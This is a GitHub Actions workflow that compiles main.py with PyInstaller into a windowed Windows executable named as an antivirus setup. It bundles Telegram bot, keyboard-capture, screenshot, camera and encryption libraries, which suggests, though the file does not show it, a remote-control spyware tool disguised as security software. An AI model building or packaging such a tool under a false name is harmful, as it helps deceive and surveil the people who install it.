name: Build TapokAntivirus

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v4

    - name: Set up Python
      uses: actions/setup-python@v5
      with:
        python-version: '3.10'

    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install pyinstaller
        pip install -r requirements.txt

    - name: Build with PyInstaller
      run: |
        pyinstaller --noconfirm --onefile --windowed `
        --collect-all telebot `
        --collect-all requests `
        --collect-all pyautogui `
        --collect-all psutil `
        --collect-all PIL `
        --collect-all win32com `
        --collect-all pythoncom `
        --collect-all cv2 `
        --collect-all numpy `
        --collect-all moviepy `
        --collect-all pynput `
        --collect-all Crypto `
        --collect-all pywinauto `
        --name "TapokAntivirus_SetupV4" `
        --icon "icon.ico" `
        main.py

    - name: Upload Artifact
      uses: actions/upload-artifact@v4
      with:
        name: TapokAntivirus-Build
        path: dist/TapokAntivirus_SetupV4.exe
        
